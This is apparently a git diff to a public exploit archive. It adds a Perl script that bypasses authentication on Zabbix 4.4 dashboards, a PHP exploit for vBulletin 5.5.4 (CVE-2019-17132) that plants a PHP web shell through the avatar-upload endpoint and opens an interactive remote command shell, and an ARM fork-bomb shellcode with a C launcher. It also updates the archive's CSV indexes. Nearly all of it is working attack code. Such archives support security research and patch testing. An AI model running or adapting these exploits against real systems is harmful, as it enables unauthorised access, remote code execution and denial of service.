diff --git a/exploits/php/webapps/47474.pl b/exploits/php/webapps/47474.pl
new file mode 100755
index 000000000..6ab6c3bdb
--- /dev/null
+++ b/exploits/php/webapps/47474.pl
@@ -0,0 +1,123 @@
+# Exploit Title: Zabbix 4.4 - Authentication Bypass
+# Date: 2019-10-06
+# Exploit Author: Todor Donev
+# Software Link: https://www.zabbix.com/download
+# Version: Zabbix 4.4
+# Tested on: Linux Apache/2 PHP/7.2
+
+#
+#  Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
+#
+#  Copyright 2019 (c) Todor Donev 
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#	#  [ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
+#	#  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
+#	#  [ Initializing the browser
+#	#  [ >>> Referer => 
+#	#  [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
+#	#  [ >>> Content-Type => application/x-www-form-urlencoded
+#	#  [ <<< Cache-Control => no-store, no-cache, must-revalidate
+#	#  [ <<< Connection => close
+#	#  [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
+#	#  [ <<< Pragma => no-cache
+#	#  [ <<< Server => nginx
+#	#  [ <<< Vary => Accept-Encoding
+#	#  [ <<< Content-Type => text/html; charset=UTF-8
+#	#  [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
+#	#  [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
+#	#  [ <<< Client-Peer => 
+#	#  [ <<< Client-Response-Num => 1
+#	#  [ <<< Client-SSL-Cert-Issuer => 
+#	#  [ <<< Client-SSL-Cert-Subject => 
+#	#  [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
+#	#  [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
+#	#  [ <<< Client-SSL-Warning => Peer certificate not verified
+#	#  [ <<< Client-Transfer-Encoding => chunked
+#	#  [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
+#	#  [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
+#	#  [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
+#	#  [ <<< Title => TARGET: Dashboard
+#	#  [ <<< X-Content-Type-Options => nosniff
+#	#  [ <<< X-Frame-Options => SAMEORIGIN
+#	#  [ <<< X-Meta-Author => Zabbix SIA
+#	#  [ <<< X-Meta-Charset => utf-8
+#	#  [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
+#	#  [ <<< X-Meta-Msapplication-Config => none
+#	#  [ <<< X-Meta-Msapplication-TileColor => #d40000
+#	#  [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
+#	#  [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
+#	#  [ <<< X-UA-Compatible => IE=Edge
+#	#  [ <<< X-XSS-Protection => 1; mode=block
+#	#  [
+#	#  [ The target is vulnerable. Try to open these links:
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
+#	#  [ https://TARGET/zabbix/overview.php?ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
+#	#  [ https://TARGET/zabbix/latest.php?ddreset=1
+#	#  [ https://TARGET/zabbix/charts.php?ddreset=1
+#	#  [ https://TARGET/zabbix/screens.php?ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
+#	#  [ https://TARGET/zabbix/srv_status.php?ddreset=1
+#	#  [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
+#	#  [ https://TARGET/zabbix/hostinventories.php?ddreset=1
+#	#  [ https://TARGET/zabbix/report2.php?ddreset=1
+#	#  [ https://TARGET/zabbix/toptriggers.php?ddreset=1
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
+#	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
+# 
+
+#!/usr/bin/perl -w
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use HTML::TreeBuilder;
+my $host = shift || ''; # Full path url to the store
+$host =~ s|/$||;
+print "\033[2J";    #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit\n";
+print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
+print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
+my $response = $browser->request($request);
+print "[ >>> $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<< $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
+print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
+if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
+    print "[\n[ The target is vulnerable. Try to open these links:\n";
+    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
+    my @files = $tree->look_down(_tag => 'a');
+    for my $line (@files){
+        next if ($line->attr('href') =~ m/javascript/);
+        next if ($line->attr('href') =~ m/\#/);
+        next if ($line->attr('href') =~ m/http/);
+        print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
+    }
+} else { 
+        print "[ Exploit failed! The target isn't vulnerable\n";
+        exit;
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47475.php b/exploits/php/webapps/47475.php
new file mode 100644
index 000000000..08247ebb2
--- /dev/null
+++ b/exploits/php/webapps/47475.php
@@ -0,0 +1,121 @@
+<?php
+
+/*
+    ---------------------------------------------------------------------
+    vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
+    ---------------------------------------------------------------------
+    
+    author..............: Egidio Romano aka EgiX
+    mail................: n0b0d13s[at]gmail[dot]com
+    software link.......: https://www.vbulletin.com/
+    
+    +-------------------------------------------------------------------------+
+    | This proof of concept code was written for educational purpose only.    |
+    | Use it at your own risk. Author will be not responsible for any damage. |
+    +-------------------------------------------------------------------------+
+    
+    [-] Vulnerability Description:
+      
+    User input passed through the "data[extension]" and "data[filedata]" parameters to
+    the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used
+    to update users' avatars. This can be exploited to inject and execute arbitrary PHP code.
+    Successful exploitation of this vulnerability requires the "Save Avatars as Files" option
+    to be enabled (disabled by default).
+
+    [-] Disclosure timeline:
+    
+    [30/09/2019] - Vendor notified
+    [03/10/2019] - Patch released: https://bit.ly/2OptAzI
+    [04/10/2019] - CVE number assigned (CVE-2019-17132)
+    [07/10/2019] - Public disclosure
+
+*/
+
+set_time_limit(0);
+error_reporting(E_ERROR);
+
+if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
+
+print "+-------------------------------------------------------------------------+";
+print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |";
+print "\n+-------------------------------------------------------------------------+\n";
+
+if ($argc != 4)
+{
+	print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
+	print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
+	print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";
+	die();
+}
+
+list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
+
+$ch = curl_init();
+
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_HEADER, true);
+
+print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+
+if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");
+
+curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
+curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
+curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
+
+if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");
+
+print "[-] Logged-in! Retrieving security token...\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POST, false);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
+
+if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");
+
+print "[-] Uploading new avatar...\n";
+
+$params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]];
+
+curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
+curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
+curl_setopt($ch, CURLOPT_HEADER, false);
+
+if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");
+
+if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");
+
+print "[-] Updating avatar with PHP shell...\n";
+
+$php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>';
+
+$params = ["routestring" => "ajax/api/user/updateAvatar",
+           "userid" => 0,
+           "avatarid" => 0,
+           "data[extension]" => "php",
+           "data[filedata]" => $php_code,
+           "securitytoken" => $token[1]];
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
+
+if (curl_exec($ch) !== "true") die("[-] Update failed!\n");
+
+print "[-] Launching shell...\n";
+
+preg_match('/(\d+)\.jpeg/', $path, $m);
+$path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);
+
+curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
+curl_setopt($ch, CURLOPT_POST, false);
+
+while(1)
+{
+    print "\nvb-shell# ";
+    if (($cmd = trim(fgets(STDIN))) == "exit") break;
+    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
+    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6c3923ac4..c1b43c91d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41794,7 +41794,7 @@ id,file,description,date,author,type,platform,port
 47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
 47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
 47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' Disable Functions Bypass",2019-09-28,mm0r1,webapps,multiple,
-47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
+47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
 47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
 47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
@@ -41805,3 +41805,5 @@ id,file,description,date,author,type,platform,port
 47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
 47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
 47470,exploits/java/webapps/47470.txt,"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload",2019-10-07,"Jakub Palaczynski",webapps,java,
+47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,
+47475,exploits/php/webapps/47475.php,"vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution",2019-10-07,EgiX,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 75d4df1f6..4f82bd66b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1003,3 +1003,4 @@ id,file,description,date,author,type,platform
 47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86
 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
+47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
diff --git a/shellcodes/arm/47473.c b/shellcodes/arm/47473.c
new file mode 100644
index 000000000..0da058c1b
--- /dev/null
+++ b/shellcodes/arm/47473.c
@@ -0,0 +1,79 @@
+# Title:  Linux/ARM - Fork Bomb Shellcode (20 bytes)
+# Date:   2019-10-07
+# Category: Shellcode
+# Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite)
+# Author: CJHackerz
+# Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash
+
+/*
+## Compilation instruction
+
+pi@raspberrypi:~ cat forkbomb_ARM32.s
+.text
+.global _start
+
+_start:
+	.code 32
+	ADD R3, PC, #1	//Switching to Thumb mode
+	BX R3
+
+	.code 16
+	_loop:
+		EOR R7, R7
+		MOV R7, #2	//Syscall to fork()
+		SVC #1
+		MOV R8, R8 //NOP
+		BL _loop
+
+pi@raspberrypi:~ cat Makefile
+forkbomb_ARM32:  forkbomb_ARM32.o
+	ld forkbomb_ARM32.o -o forkbomb_ARM32
+forkbomb_ARM32.o:  forkbomb_ARM32.s
+	as forkbomb_ARM32.s -o forkbomb_ARM32.o
+clean:
+	rm *.o forkbomb_ARM32
+pi@raspberrypi:~ make
+pi@raspberrypi:~ objcopy -O binary forkbomb_ARM32 forkbomb_ARM32.bin
+pi@raspberrypi:~ hexdump -v -e '"\\""x" 1/1 "%02x" ""' forkbomb_ARM32.bin && echo
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff
+
+## Testing compiled shellcode
+pi@raspberrypi:~ file forkbomb_ARM32
+forkbomb_ARM32: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, not stripped
+pi@raspberrypi:~ strace ./forkbomb_ARM32
+execve("./forkbomb_ARM32", ["./forkbomb_ARM32"], 0x7eab36e0 ) = 0
+fork()                                  = 21975
+fork()                                  = 22000
+fork()                                  = 22016
+fork()                                  = 22044
+fork()                                  = 22087
+fork()                                  = 22125
+fork()                                  = 22162
+fork()                                  = 22199
+fork()                                  = 22242
+fork()                                  = 22287
+fork()                                  = 22326
+fork()                                  = 23343
+fork()                                  = 23501
+fork()                                  = 23539
+fork()                                  = 23606
+fork()                                  = 26670
+^Cstrace: Process 21974 detached
+
+## Steps to compile given shellcode C program file
+pi@raspberrypi:~ gcc -fno-stack-protector -z execstack forkbomb_ARM32.c -o forkbomb_ARM32-test
+
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff";
+main(){
+
+	printf("Shellcode Length:  %d\n", (int)strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+
+	ret();
+}
\ No newline at end of file